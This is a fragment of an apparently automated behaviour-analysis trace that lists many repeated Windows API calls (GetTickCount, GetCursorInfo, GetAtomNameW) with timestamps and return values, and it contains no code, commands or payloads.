0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.371] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.372] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.373] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.374] GetTickCount () returned 0x1152b36 [0117.957] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.958] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.958] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.958] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.958] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.958] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.958] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.958] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.958] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.958] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.958] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.958] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.959] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.959] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.960] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.960] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.961] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.961] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.962] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.962] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.963] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.963] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.964] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.964] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.965] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.965] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.966] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.966] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] GetCursorInfo (in: pci=0x0 | out: pci=0x0) returned 0 [0117.967] GetAtomNameW (in: nAtom=0x0, lpBuffer=0x0, nSize=0 | out: lpBuffer=0x0) returned 0x0 [0117.967] 